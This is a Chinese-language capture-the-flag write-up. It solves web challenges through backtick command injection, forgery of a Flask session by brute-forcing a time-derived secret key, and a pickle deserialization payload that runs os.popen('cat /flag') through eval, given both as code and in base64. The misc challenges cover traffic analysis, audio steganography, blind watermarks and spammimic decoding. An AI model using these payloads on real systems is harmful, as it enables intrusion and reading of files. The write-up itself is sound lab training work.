web

What the cow say?

进入容器有个输入框，尝试ssti、命令执行、代码执行等，最后发现可使用反引号执行命令；

输入 `nl app.py` 可查看源代码，有功能具体实现、过滤之类的；

flag在 /flag_is_here home/flag_c0w54y 中，执行命令获取flag；

myflask

访问题目地址获得app.py源代码；

# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezonecurrentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)@app.route('/')
def index():session['username'] = 'guest'return send_file('app.py')@app.route('/flag', methods=['GET', 'POST'])
def flag():if not session:return 'There is no session available in your client :('if request.method == 'GET':return 'You are {} now'.format(session['username'])# For POST requests from adminif session['username'] == 'admin':pickle_data=base64.b64decode(request.form.get('pickle_data'))# Tips: Here try to trigger RCEuserdata=pickle.loads(pickle_data)return userdataelse:return 'Access Denied'if __name__=='__main__':app.run(debug=True, host="0.0.0.0")

分析源码，/ 路由可下载app.py文件，/flag 路由会判断有无session，有session则输入对应用户名，如果session的用户名为admin，会对post传入的数据进行pickle反序列化，明显存在pickle反序列化漏洞；

首先需要进行session伪造，密钥由时间的时分秒组合而成，如在10:10:10时间获取的session，则密钥为101010，写脚本对获取session的1分钟时间爆破即可；

开启环境，访问 / 路由，并记录时间如13:25，访问/flag此时为guest用户

python版本为3，使用flask_session_cookie_manager3.py伪造session，写脚本爆破session密钥，记录的时间为13:25，爆破132500-132559即可；

# 1.py
import osfor k in range(0, 60):if k < 10:secret = '13250' + str(k)else:secret = '1325' + str(k)c = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bc"print(os.popen(f"python flask_session_cookie_manager3.py decode -s {secret} -c {c}").read(), end='')print('*****' + secret)

伪造session，并修改网站session，此时为admin用户，可以进行pickle反序列化了；

构造payload；

import pickle
import base64class Flag(object):def __reduce__(self):return (eval, ("__import__('os').popen('cat /flag').read()",))flag = Flag()
print(base64.b64encode(pickle.dumps(flag)))# payload
# pickle_data=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu

提交payload进行pickle反序列化触发rce获取flag；

misc

ek1ng_want_girlfriend

流量分析，使用wireshark打开流量包过滤http，发现有一张图片ek1ng.jpg；

选中请求图片的响应(241 HTTP/1.0 200 OK)，选择 文件 => 导出对象 => http，导出ek1ng.jpg图片保存；

打开导出的图片，发现flag在图片下方；

龙之舞

下载附件deepsound_of_dragon_dance.wav，根据附件名猜测deepsound隐写，使用工具打开发现需要密码；

将附件放入Audacity查看频谱图发现隐写数据；

需要上下翻转看，内容为：KEY  : 5H8w1nlWCX3hQLG ，使用5H8w1nlWCX3hQLG 作为deepsound密码，成功分离出隐藏的压缩包；

压缩包内是一张gif动图，在第55、121、153、232帧处分别有一张四分之一的二维码图片；

将四张二维码碎片拼接并修复后扫描获得flag；

ezWord

下载附件是一个word文档，将后缀改为zip解压，发现word/media目录下有四个文件；

结合题目描述：通过破译图片的水印来解开文档里的秘密吧！，可知两张图片为盲水印，使用blindwatermark 工具可提取盲水印，T1hi3sI4sKey，根据 恭喜.txt 中提示为压缩包密码；

# 盲水印提取
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png# blindwatermark工具下载
https://github.com/chishaxie/BlindWaterMark

使用 T1hi3sI4sKey 密码解压secret.zip，在secret.txt中有如下一段英文；

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But don't believe
us . Ms Simpson who resides in Maine tried us and says
"I've been poor and I've been rich - rich is better"
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and you'll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson of Illinois tried
us and says "Now I'm rich many more things are possible"
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more & SELL MORE . You can begin
at absolutely no cost to you . But don't believe us
. Mr Jones of Minnesota tried us and says "I was skeptical
but it worked for me" ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and you'll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customer's
doorstep & turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But don't
believe us . Ms Anderson who resides in New York tried
us and says "My only problem now is where to park all
my cars" ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and you'll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But don't
believe us . Mrs Anderson of Indiana tried us and says
"Now I'm rich, Rich, RICH" . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customer's doorstep
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Simpson of Illinois tried us
and says "I was skeptical but it worked for me" . We
are licensed to operate in all states ! Because the
Internet operates on "Internet time" you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But don't believe us ! Mrs Anderson who
resides in Alabama tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it & nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But don't
believe us ! Prof Ames who resides in Washington tried
us and says "I was skeptical but it worked for me"
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and you'll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills & people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS & SELL MORE . You can begin at absolutely
no cost to you ! But don't believe us . Mr Ames of
Louisiana tried us and says "Now I'm rich, Rich, RICH"
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and you'll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .

搜索发现是 卡尔达诺栅格码Spam Mimic ，在线网站spammimic - decode解密获得如下中文；

籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

中文转unicode，获得16进制数

71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86

 对比前几个16进制数，发现与 hgame 的ascii码差9，写脚本获取flag；

a = '71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86'
flag = ''
for i in range(0, len(a), 2):flag += chr(int(a[i: i +2], 16) - 9)
print(flag) # hgame{0k_you_s0lve_al1_th3_secr3t}